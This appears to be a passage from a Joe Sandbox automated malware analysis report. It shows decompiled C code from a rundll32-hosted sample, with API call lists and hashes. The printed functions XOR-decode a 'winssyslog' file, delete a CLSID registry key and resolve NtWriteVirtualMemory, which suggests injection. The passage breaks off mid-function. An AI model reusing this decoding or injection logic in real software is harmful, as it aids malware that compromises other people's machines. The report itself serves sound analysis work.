                                                                                              						_t44 =  *0x42a7adc; // 0x0
                                                                                              						__eflags = _t44[0x83];
                                                                                              						_t71 =  ==  ? 0 :  *0x42a78c9 & 0x000000ff;
                                                                                              						__eflags = _t71;
                                                                                              						 *0x42a78c9 = _t71;
                                                                                              						return _t63;
                                                                                              						goto L19;
                                                                                              						L10:
                                                                                              						__eflags = _t43 - 2;
                                                                                              						if(_t43 == 2) {
                                                                                              							_t72 =  *(_t89 + 0x24);
                                                                                              							__eflags = _t72;
                                                                                              							if(_t72 != 0) {
                                                                                              								_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)) + 0x40))();
                                                                                              								__eflags = _t47;
                                                                                              								if(_t47 != 0) {
                                                                                              									__eflags =  *(_t89 + 0x48);
                                                                                              									goto L14;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						goto L18;
                                                                                              					}
                                                                                              				} else {
                                                                                              					 *0x42a78c9 = 1;
                                                                                              					_t88 = 0;
                                                                                              					asm("o16 nop [eax+eax]");
                                                                                              					while(_t35 == 0) {
                                                                                              						Sleep(0x64);
                                                                                              						if(_t88 == 0x63) {
                                                                                              							 *0x42a78c9 = 0;
                                                                                              							return _t63;
                                                                                              						} else {
                                                                                              							_t35 =  *0x42a7adc; // 0x0
                                                                                              							_t88 = _t88 + 1;
                                                                                              							_t98 = _t88 - 0x64;
                                                                                              							if(_t88 < 0x64) {
                                                                                              								continue;
                                                                                              							} else {
                                                                                              								goto L5;
                                                                                              							}
                                                                                              						}
                                                                                              						goto L19;
                                                                                              					}
                                                                                              					goto L5;
                                                                                              				}
                                                                                              				L19:
                                                                                              			}






























                                                                                              0x0425afb0
                                                                                              0x0425afb3
                                                                                              0x0425afb4
                                                                                              0x0425afb8
                                                                                              0x0425afba
                                                                                              0x0425afc2
                                                                                              0x0425afc8
                                                                                              0x0425afcd
                                                                                              0x0425afd0
                                                                                              0x0425afd3
                                                                                              0x0425afd9
                                                                                              0x0425afdf
                                                                                              0x0425afe2
                                                                                              0x0425afe7
                                                                                              0x0425afef
                                                                                              0x0425b018
                                                                                              0x0425b01e
                                                                                              0x0425b01f
                                                                                              0x0425b022
                                                                                              0x0425b024
                                                                                              0x0425b02a
                                                                                              0x0425b02c
                                                                                              0x0425b02d
                                                                                              0x0425b031
                                                                                              0x0425b038
                                                                                              0x0425b03b
                                                                                              0x0425b046
                                                                                              0x0425b04a
                                                                                              0x0425b04f
                                                                                              0x0425b056
                                                                                              0x0425b060
                                                                                              0x0425b060
                                                                                              0x0425b060
                                                                                              0x0425b063
                                                                                              0x0425b06a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425b06c
                                                                                              0x0425b071
                                                                                              0x00000000
                                                                                              0x0425b073
                                                                                              0x0425b078
                                                                                              0x0425b0b7
                                                                                              0x0425b0b7
                                                                                              0x0425b0b9
                                                                                              0x0425b0bf
                                                                                              0x0425b0c2
                                                                                              0x0425b0c6
                                                                                              0x0425b0ce
                                                                                              0x0425b0d7
                                                                                              0x0425b0da
                                                                                              0x0425b0e9
                                                                                              0x0425b0ed
                                                                                              0x0425b0f0
                                                                                              0x0425b0f4
                                                                                              0x0425b0fc
                                                                                              0x0425b0ff
                                                                                              0x0425b105
                                                                                              0x0425b108
                                                                                              0x0425b109
                                                                                              0x0425b10f
                                                                                              0x0425b115
                                                                                              0x0425b11a
                                                                                              0x0425b125
                                                                                              0x0425b125
                                                                                              0x0425b12d
                                                                                              0x00000000
                                                                                              0x0425b12d
                                                                                              0x0425b0b7
                                                                                              0x0425b134
                                                                                              0x0425b134
                                                                                              0x0425b144
                                                                                              0x0425b14d
                                                                                              0x0425b14d
                                                                                              0x0425b150
                                                                                              0x0425b159
                                                                                              0x00000000
                                                                                              0x0425b08e
                                                                                              0x0425b08e
                                                                                              0x0425b091
                                                                                              0x0425b097
                                                                                              0x0425b09a
                                                                                              0x0425b09c
                                                                                              0x0425b0a8
                                                                                              0x0425b0ab
                                                                                              0x0425b0ad
                                                                                              0x0425b0b3
                                                                                              0x00000000
                                                                                              0x0425b0b3
                                                                                              0x0425b0ad
                                                                                              0x0425b09c
                                                                                              0x00000000
                                                                                              0x0425b091
                                                                                              0x0425aff1
                                                                                              0x0425aff1
                                                                                              0x0425aff8
                                                                                              0x0425affa
                                                                                              0x0425b000
                                                                                              0x0425b006
                                                                                              0x0425b00b
                                                                                              0x0425b080
                                                                                              0x0425b08b
                                                                                              0x0425b00d
                                                                                              0x0425b00d
                                                                                              0x0425b012
                                                                                              0x0425b013
                                                                                              0x0425b016
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425b016
                                                                                              0x00000000
                                                                                              0x0425b00b
                                                                                              0x00000000
                                                                                              0x0425b000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,042A78D8,?,04259B4C,?,042A78D8,00000000), ref: 0425AFD3
                                                                                              • Sleep.KERNEL32(00000064,?,?,?,042A78D8,?,04259B4C,?,042A78D8,00000000), ref: 0425B006
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,042A78D8,00000002,0000003F,?,?,?,?,042A78D8,?,04259B4C,?), ref: 0425B03B
                                                                                              • Sleep.KERNEL32(00000096,?,?,?,?,042A78D8,?,04259B4C,?), ref: 0425B046
                                                                                              • LocalAlloc.KERNEL32(00000040,74CB6491,?,?,?,?,042A78D8,?,04259B4C,?), ref: 0425B0E3
                                                                                              • LocalFree.KERNEL32(00000000,00000000,74CB6491,0000003F), ref: 0425B10F
                                                                                              • Sleep.KERNEL32(0000012C,?,?,?,?,042A78D8,?,04259B4C,?), ref: 0425B12D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$Local$AllocCreateEventFreeObjectSingleWait
                                                                                              • String ID: ~
                                                                                              • API String ID: 824083382-1707062198
                                                                                              • Opcode ID: 2e6fb64ff8792998b205709be8355bb5b6178b9ce31de8ba444a311a1f1e46df
                                                                                              • Instruction ID: 72642e3bba5d41a8c959706de645c75185e1fc1b113f03026cfd9e844b2b8978
                                                                                              • Opcode Fuzzy Hash: 2e6fb64ff8792998b205709be8355bb5b6178b9ce31de8ba444a311a1f1e46df
                                                                                              • Instruction Fuzzy Hash: 5451E035700205AFDB24DF28EC88B69BBE5EF49300F1480A8ED058B2A2DA75FC00CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 83%
                                                                                              			E0425EEC0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				void* _v612;
                                                                                              				signed int _t29;
                                                                                              				signed int _t38;
                                                                                              				intOrPtr* _t43;
                                                                                              				signed int _t45;
                                                                                              				void* _t51;
                                                                                              				signed int _t54;
                                                                                              				intOrPtr* _t57;
                                                                                              				intOrPtr* _t68;
                                                                                              				void* _t70;
                                                                                              				void* _t71;
                                                                                              				signed int* _t72;
                                                                                              				intOrPtr* _t75;
                                                                                              				signed int _t76;
                                                                                              				void* _t77;
                                                                                              
                                                                                              				_t29 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t29 ^ _t76;
                                                                                              				_t57 =  *0x42a7aec; // 0x6708f0
                                                                                              				_t70 = __ecx;
                                                                                              				_t75 =  *_t57;
                                                                                              				_v612 = __ecx;
                                                                                              				while(_t75 != _t57) {
                                                                                              					while( *_t43 ==  *_t68) {
                                                                                              						_t43 = _t43 + 4;
                                                                                              						_t68 = _t68 + 4;
                                                                                              						_t71 = _t71 - 4;
                                                                                              						if(_t71 >= 0) {
                                                                                              							continue;
                                                                                              						}
                                                                                              						if( *_t43 ==  *_t68) {
                                                                                              							_t72 =  *(_t75 + 8);
                                                                                              							_t45 =  *_t72;
                                                                                              							__eflags = _t45;
                                                                                              							if(_t45 == 0) {
                                                                                              								L14:
                                                                                              								_t72[0xa] = 0;
                                                                                              								_t73 =  *(_t75 + 8);
                                                                                              								__eflags =  *(_t75 + 8);
                                                                                              								if(__eflags != 0) {
                                                                                              									E0425E280(_t73, __eflags);
                                                                                              									_push(0x30);
                                                                                              									E04275B47(_t73);
                                                                                              									_t77 = _t77 + 8;
                                                                                              								}
                                                                                              								 *((intOrPtr*)( *((intOrPtr*)(_t75 + 4)))) =  *_t75;
                                                                                              								 *((intOrPtr*)( *_t75 + 4)) =  *((intOrPtr*)(_t75 + 4));
                                                                                              								 *0x42a7af0 =  *0x42a7af0 - 1;
                                                                                              								__eflags =  *0x42a7af0;
                                                                                              								L04275B81(_t75);
                                                                                              								_t70 = _v612;
                                                                                              								_t77 = _t77 + 4;
                                                                                              								goto L17;
                                                                                              							}
                                                                                              							__eflags =  *(_t45 + 4);
                                                                                              							_t72[0xa] = 1;
                                                                                              							_t72[9] = 0;
                                                                                              							if( *(_t45 + 4) != 0) {
                                                                                              								L12:
                                                                                              								_t51 = _t72[8];
                                                                                              								__eflags = _t51;
                                                                                              								if(_t51 != 0) {
                                                                                              									WaitForSingleObject(_t51, 0xffffffff);
                                                                                              									CloseHandle(_t72[8]);
                                                                                              									_t72[8] = 0;
                                                                                              								}
                                                                                              								goto L14;
                                                                                              							}
                                                                                              							_t66 = _t72[0xb];
                                                                                              							__eflags = _t72[0xb];
                                                                                              							if(_t72[0xb] == 0) {
                                                                                              								goto L14;
                                                                                              							}
                                                                                              							_t54 = E0425D260(_t66, "stop");
                                                                                              							__eflags = _t54;
                                                                                              							if(_t54 == 0) {
                                                                                              								goto L14;
                                                                                              							}
                                                                                              							 *_t54();
                                                                                              							goto L12;
                                                                                              						}
                                                                                              						break;
                                                                                              					}
                                                                                              					_t75 =  *_t75;
                                                                                              					_t70 = _v612;
                                                                                              				}
                                                                                              				L17:
                                                                                              				__eflags = _a4;
                                                                                              				if(_a4 != 0) {
                                                                                              					E04266050(_t57, L"Pg",  &_v88, _t70, _t75);
                                                                                              					wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s\\%s",  &_v88, _t70);
                                                                                              					_v612 = 0;
                                                                                              					_t38 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20106,  &_v612);
                                                                                              					__eflags = _t38;
                                                                                              					if(_t38 == 0) {
                                                                                              						SHDeleteKeyW(_v612, 0x429c5d0);
                                                                                              						RegCloseKey(_v612);
                                                                                              					}
                                                                                              				}
                                                                                              				__eflags = _v8 ^ _t76;
                                                                                              				return E04275AFE(_v8 ^ _t76);
                                                                                              			}





















                                                                                              0x0425eec9
                                                                                              0x0425eed0
                                                                                              0x0425eed4
                                                                                              0x0425eedc
                                                                                              0x0425eede
                                                                                              0x0425eee0
                                                                                              0x0425eee6
                                                                                              0x0425ef00
                                                                                              0x0425ef06
                                                                                              0x0425ef09
                                                                                              0x0425ef0c
                                                                                              0x0425ef0f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425ef15
                                                                                              0x0425ef21
                                                                                              0x0425ef24
                                                                                              0x0425ef26
                                                                                              0x0425ef28
                                                                                              0x0425ef75
                                                                                              0x0425ef75
                                                                                              0x0425ef7c
                                                                                              0x0425ef7f
                                                                                              0x0425ef81
                                                                                              0x0425ef85
                                                                                              0x0425ef8a
                                                                                              0x0425ef8d
                                                                                              0x0425ef92
                                                                                              0x0425ef92
                                                                                              0x0425ef9b
                                                                                              0x0425efa2
                                                                                              0x0425efa5
                                                                                              0x0425efa5
                                                                                              0x0425efab
                                                                                              0x0425efb0
                                                                                              0x0425efb6
                                                                                              0x00000000
                                                                                              0x0425efb6
                                                                                              0x0425ef2a
                                                                                              0x0425ef2e
                                                                                              0x0425ef35
                                                                                              0x0425ef3c
                                                                                              0x0425ef55
                                                                                              0x0425ef55
                                                                                              0x0425ef58
                                                                                              0x0425ef5a
                                                                                              0x0425ef5f
                                                                                              0x0425ef68
                                                                                              0x0425ef6e
                                                                                              0x0425ef6e
                                                                                              0x00000000
                                                                                              0x0425ef5a
                                                                                              0x0425ef3e
                                                                                              0x0425ef41
                                                                                              0x0425ef43
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425ef4a
                                                                                              0x0425ef4f
                                                                                              0x0425ef51
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425ef53
                                                                                              0x00000000
                                                                                              0x0425ef53
                                                                                              0x00000000
                                                                                              0x0425ef15
                                                                                              0x0425ef17
                                                                                              0x0425ef19
                                                                                              0x0425ef19
                                                                                              0x0425efb9
                                                                                              0x0425efb9
                                                                                              0x0425efbd
                                                                                              0x0425efc7
                                                                                              0x0425efdd
                                                                                              0x0425efe6
                                                                                              0x0425f00a
                                                                                              0x0425f010
                                                                                              0x0425f012
                                                                                              0x0425f01f
                                                                                              0x0425f02b
                                                                                              0x0425f02b
                                                                                              0x0425f012
                                                                                              0x0425f036
                                                                                              0x0425f041

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000001), ref: 0425EF5F
                                                                                              • CloseHandle.KERNEL32(?), ref: 0425EF68
                                                                                              • wsprintfW.USER32 ref: 0425EFDD
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 0425F00A
                                                                                              • SHDeleteKeyW.SHLWAPI(00000000,0429C5D0), ref: 0425F01F
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0425F02B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteHandleObjectOpenSingleWaitwsprintf
                                                                                              • String ID: SOFTWARE\Classes\CLSID\%s\%s$stop
                                                                                              • API String ID: 1878782464-96441376
                                                                                              • Opcode ID: 0081d851142e2af885e4d3718c9ae23285c98241d18f781a6be3b4e184f9f24c
                                                                                              • Instruction ID: 77a3b11fb2bcd6f16429605ea60665d178c4292dead0076fe52bc39e2cb37100
                                                                                              • Opcode Fuzzy Hash: 0081d851142e2af885e4d3718c9ae23285c98241d18f781a6be3b4e184f9f24c
                                                                                              • Instruction Fuzzy Hash: F741A031B14205EFEB20DF68D888B6AB7B9FF48314F150159E84997690DB71FE41CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 44%
                                                                                              			E0425B6D0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				short _v528;
                                                                                              				long _v532;
                                                                                              				void* _v536;
                                                                                              				intOrPtr _v540;
                                                                                              				void* _v544;
                                                                                              				signed int _t19;
                                                                                              				void* _t30;
                                                                                              				long _t41;
                                                                                              				void* _t56;
                                                                                              				void* _t58;
                                                                                              				void* _t59;
                                                                                              				void* _t61;
                                                                                              				long _t62;
                                                                                              				signed int _t65;
                                                                                              
                                                                                              				_t19 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t19 ^ _t65;
                                                                                              				_v540 = __ecx;
                                                                                              				_push(0);
                                                                                              				_v532 = 0;
                                                                                              				E04266370(__ebx, L"winssyslog",  &_v528, __edi, __esi, 8);
                                                                                              				_t58 = CreateFileW( &_v528, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                              				_v544 = _t58;
                                                                                              				_t72 = _t58 - 0xffffffff;
                                                                                              				if(_t58 == 0xffffffff) {
                                                                                              					__eflags = _v8 ^ _t65;
                                                                                              					return E04275AFE(_v8 ^ _t65);
                                                                                              				} else {
                                                                                              					_push(__ebx);
                                                                                              					_push(__esi);
                                                                                              					_t41 = GetFileSize(_t58, 0);
                                                                                              					_push(_t41);
                                                                                              					_t61 = E04275B55(L"winssyslog", __esi, _t72);
                                                                                              					_v536 = _t61;
                                                                                              					ReadFile(_t58, _t61, _t41,  &_v532, 0);
                                                                                              					_t30 = 0;
                                                                                              					if(_t41 != 0) {
                                                                                              						if(_t41 >= 0x20) {
                                                                                              							asm("movaps xmm2, [0x429f990]");
                                                                                              							_t56 = _t41 - (_t41 & 0x0000001f);
                                                                                              							asm("o16 nop [eax+eax]");
                                                                                              							do {
                                                                                              								asm("movups xmm0, [esi+eax]");
                                                                                              								asm("movaps xmm1, xmm2");
                                                                                              								asm("pxor xmm1, xmm0");
                                                                                              								asm("movups [esi+eax], xmm1");
                                                                                              								asm("movups xmm0, [esi+eax+0x10]");
                                                                                              								asm("pxor xmm0, xmm2");
                                                                                              								asm("movups [esi+eax+0x10], xmm0");
                                                                                              								_t30 = _t30 + 0x20;
                                                                                              							} while (_t30 < _t56);
                                                                                              						}
                                                                                              						while(_t30 < _t41) {
                                                                                              							 *(_t30 + _t61) =  *(_t30 + _t61) ^ 0x00000058;
                                                                                              							_t30 = _t30 + 1;
                                                                                              						}
                                                                                              					}
                                                                                              					_t11 = _t41 + 1; // 0x1
                                                                                              					_t62 = _t11;
                                                                                              					_t59 = LocalAlloc(0x40, _t62);
                                                                                              					_t13 = _t59 + 1; // 0x1
                                                                                              					 *_t59 = 0x7f;
                                                                                              					E0427E060(_t13, _v536, _t41);
                                                                                              					_push(0x3f);
                                                                                              					_push(_t62);
                                                                                              					E04251C60( *((intOrPtr*)(_v540 + 4)));
                                                                                              					LocalFree(_t59);
                                                                                              					E04275B0F(_v536);
                                                                                              					CloseHandle(_v544);
                                                                                              					return E04275AFE(_v8 ^ _t65, _t59);
                                                                                              				}
                                                                                              			}


















                                                                                              0x0425b6d9
                                                                                              0x0425b6e0
                                                                                              0x0425b6e4
                                                                                              0x0425b6f0
                                                                                              0x0425b6f9
                                                                                              0x0425b703
                                                                                              0x0425b72a
                                                                                              0x0425b72c
                                                                                              0x0425b732
                                                                                              0x0425b735
                                                                                              0x0425b82e
                                                                                              0x0425b839
                                                                                              0x0425b73b
                                                                                              0x0425b73b
                                                                                              0x0425b73c
                                                                                              0x0425b746
                                                                                              0x0425b748
                                                                                              0x0425b751
                                                                                              0x0425b759
                                                                                              0x0425b765
                                                                                              0x0425b76b
                                                                                              0x0425b76f
                                                                                              0x0425b774
                                                                                              0x0425b776
                                                                                              0x0425b784
                                                                                              0x0425b786
                                                                                              0x0425b790
                                                                                              0x0425b790
                                                                                              0x0425b794
                                                                                              0x0425b797
                                                                                              0x0425b79b
                                                                                              0x0425b79f
                                                                                              0x0425b7a4
                                                                                              0x0425b7a8
                                                                                              0x0425b7ad
                                                                                              0x0425b7b0
                                                                                              0x0425b790
                                                                                              0x0425b7b6
                                                                                              0x0425b7b8
                                                                                              0x0425b7bc
                                                                                              0x0425b7bd
                                                                                              0x0425b7b6
                                                                                              0x0425b7c1
                                                                                              0x0425b7c1
                                                                                              0x0425b7cd
                                                                                              0x0425b7d7
                                                                                              0x0425b7da
                                                                                              0x0425b7de
                                                                                              0x0425b7ef
                                                                                              0x0425b7f1
                                                                                              0x0425b7f3
                                                                                              0x0425b7fb
                                                                                              0x0425b802
                                                                                              0x0425b810
                                                                                              0x0425b828
                                                                                              0x0425b828

                                                                                              APIs
                                                                                                • Part of subcall function 04266370: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04266396
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,74CB6490), ref: 0425B724
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,042A78D8,?,74CB6490), ref: 0425B740
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,042A78D8,?,74CB6490), ref: 0425B765
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,?,74CB6490), ref: 0425B7C7
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000001,0000003F,?,?,00000000,?,74CB6490), ref: 0425B7FB
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,74CB6490), ref: 0425B810
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Local$AllocCloseCreateDirectoryFreeHandleReadSizeSystem
                                                                                              • String ID: $winssyslog
                                                                                              • API String ID: 245316060-3650450327
                                                                                              • Opcode ID: d7c35d9c8209cdcf506780245082d6054a242d087dc626fe44968ee9dbc71cb1
                                                                                              • Instruction ID: 187b5e0763edee37eff5180c39f01e4d4b0eb04804eb2ae8006055046cee9a6e
                                                                                              • Opcode Fuzzy Hash: d7c35d9c8209cdcf506780245082d6054a242d087dc626fe44968ee9dbc71cb1
                                                                                              • Instruction Fuzzy Hash: DE412A71F1030867E7209B789C89BBAF7A8EF55304F2146A9ED09A7191EE70BD858750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 60%
                                                                                              			E04268EC0(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v16;
                                                                                              				char _v20;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				char _t11;
                                                                                              				intOrPtr* _t16;
                                                                                              				intOrPtr _t27;
                                                                                              				void* _t28;
                                                                                              				intOrPtr _t30;
                                                                                              				_Unknown_base(*)()* _t31;
                                                                                              				intOrPtr _t33;
                                                                                              				void* _t34;
                                                                                              				intOrPtr* _t35;
                                                                                              				struct HINSTANCE__* _t36;
                                                                                              				intOrPtr _t39;
                                                                                              				void* _t41;
                                                                                              
                                                                                              				_t33 = __edx;
                                                                                              				_t39 =  *0x42a7b54; // 0x7ffc
                                                                                              				_t27 = __edx;
                                                                                              				_v8 = __ecx;
                                                                                              				_t30 =  *0x42a7b50; // 0x320ea6c0
                                                                                              				_push(_t34);
                                                                                              				if(_t30 != 0 || _t39 != 0) {
                                                                                              					L7:
                                                                                              					_t35 = _a16;
                                                                                              					if(_t35 == 0) {
                                                                                              						_t11 = 0;
                                                                                              					} else {
                                                                                              						_t11 =  *_t35;
                                                                                              					}
                                                                                              					_v20 = _t11;
                                                                                              					asm("cdq");
                                                                                              					_push(_t33);
                                                                                              					_push( &_v20);
                                                                                              					_push(0);
                                                                                              					_push(_a12);
                                                                                              					_v16 = 0;
                                                                                              					asm("cdq");
                                                                                              					_push(_t33);
                                                                                              					_push(_t27);
                                                                                              					_push(_a8);
                                                                                              					asm("cdq");
                                                                                              					_t28 = E042681B0(_t30, _t39, 5, _v8, _t33, _a4);
                                                                                              					if(_t28 != 0 || _t33 != 0) {
                                                                                              						_t16 =  *0x42a7b48;
                                                                                              						if(_t16 == 0) {
                                                                                              							L17:
                                                                                              							_t36 = GetModuleHandleW(L"ntdll.dll");
                                                                                              							 *0x42a7b48 = GetProcAddress(_t36, "RtlNtStatusToDosError");
                                                                                              							_t31 = GetProcAddress(_t36, "RtlSetLastWin32Error");
                                                                                              							_t16 =  *0x42a7b48;
                                                                                              							 *0x42a7b28 = _t31;
                                                                                              						} else {
                                                                                              							_t31 =  *0x42a7b28;
                                                                                              							if(_t31 == 0) {
                                                                                              								goto L17;
                                                                                              							}
                                                                                              						}
                                                                                              						if(_t16 != 0 && _t31 != 0) {
                                                                                              							RtlRestoreLastWin32Error( *_t16(_t28));
                                                                                              						}
                                                                                              						goto L21;
                                                                                              					} else {
                                                                                              						if(_t35 != 0) {
                                                                                              							 *_t35 = _v20;
                                                                                              						}
                                                                                              						return 1;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t25 =  *0x42a7b40; // 0x32050000
                                                                                              					_t33 =  *0x42a7b44; // 0x7ffc
                                                                                              					if(_t25 == 0 && _t33 == 0) {
                                                                                              						 *0x42a7b40 = E04268390(_t30);
                                                                                              						 *0x42a7b44 = _t33;
                                                                                              					}
                                                                                              					_t30 = E04268B90(_t27, "NtWriteVirtualMemory", _t33, _t34, _t39, _t25, _t33);
                                                                                              					_t41 = _t41 + 8;
                                                                                              					 *0x42a7b50 = _t30;
                                                                                              					_t39 = _t33;
                                                                                              					 *0x42a7b54 = _t39;
                                                                                              					if(_t30 != 0 || _t39 != 0) {
                                                                                              						goto L7;
                                                                                              					} else {
                                                                                              						L21:
                                                                                              						return 0;
                                                                                              					}
                                                                                              				}
                                                                                              			}





















                                                                                              0x04268ec0
                                                                                              0x04268ec8
                                                                                              0x04268ece
                                                                                              0x04268ed0
                                                                                              0x04268ed3
                                                                                              0x04268ed9
                                                                                              0x04268edc
                                                                                              0x04268f30
                                                                                              0x04268f30
                                                                                              0x04268f35
                                                                                              0x04268f3b
                                                                                              0x04268f37
                                                                                              0x04268f37
                                                                                              0x04268f37
                                                                                              0x04268f3d
                                                                                              0x04268f43
                                                                                              0x04268f44
                                                                                              0x04268f45
                                                                                              0x04268f46
                                                                                              0x04268f48
                                                                                              0x04268f4d
                                                                                              0x04268f54
                                                                                              0x04268f55
                                                                                              0x04268f56
                                                                                              0x04268f57
                                                                                              0x04268f60
                                                                                              0x04268f6c
                                                                                              0x04268f73
                                                                                              0x04268f8e
                                                                                              0x04268f95
                                                                                              0x04268fa1
                                                                                              0x04268fb2
                                                                                              0x04268fc2
                                                                                              0x04268fc9
                                                                                              0x04268fcb
                                                                                              0x04268fd0
                                                                                              0x04268f97
                                                                                              0x04268f97
                                                                                              0x04268f9f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04268f9f
                                                                                              0x04268fd8
                                                                                              0x04268fe2
                                                                                              0x04268fe2
                                                                                              0x00000000
                                                                                              0x04268f79
                                                                                              0x04268f7b
                                                                                              0x04268f80
                                                                                              0x04268f80
                                                                                              0x04268f8d
                                                                                              0x04268f8d
                                                                                              0x04268ee2
                                                                                              0x04268ee2
                                                                                              0x04268ee7
                                                                                              0x04268eef
                                                                                              0x04268efa
                                                                                              0x04268eff
                                                                                              0x04268eff
                                                                                              0x04268f11
                                                                                              0x04268f13
                                                                                              0x04268f16
                                                                                              0x04268f1c
                                                                                              0x04268f1e
                                                                                              0x04268f26
                                                                                              0x00000000
                                                                                              0x04268fe8
                                                                                              0x04268fe8
                                                                                              0x04268ff0
                                                                                              0x04268ff0
                                                                                              0x04268f26

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0426BFF5,042690E9,00000000), ref: 04268FA6
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04268FBA
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04268FC7
                                                                                              • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04268FE2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                                                              • String ID: NtWriteVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                              • API String ID: 3496116238-1394624420
                                                                                              • Opcode ID: 8939b7844babce745bb074626eb6db4354c003777b407d2cd6646cbe7a482961
                                                                                              • Instruction ID: a0bc9c83d9b8cf5ade414fd0169c993943c40401fd88ab8e29d3aedff9c0966b
                                                                                              • Opcode Fuzzy Hash: 8939b7844babce745bb074626eb6db4354c003777b407d2cd6646cbe7a482961
                                                                                              • Instruction Fuzzy Hash: 6B3198B5B222066BDB14AE5DA944B7B77AAEBC4714F44042DFD06D3300E7B4EC544794
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 51%
                                                                                              			E04268C60(intOrPtr __ecx, char __edx) {
                                                                                              				intOrPtr _v8;
                                                                                              				void* _v16;
                                                                                              				char _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				char _v28;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr* _t13;
                                                                                              				char _t23;
                                                                                              				void* _t24;
                                                                                              				_Unknown_base(*)()* _t26;
                                                                                              				char _t28;
                                                                                              				intOrPtr _t31;
                                                                                              				struct HINSTANCE__* _t32;
                                                                                              				intOrPtr _t33;
                                                                                              				void* _t35;
                                                                                              
                                                                                              				_t28 = __edx;
                                                                                              				_t33 =  *0x42a7b34; // 0x7ffc
                                                                                              				_t23 = __edx;
                                                                                              				_t31 =  *0x42a7b30; // 0x320ea280
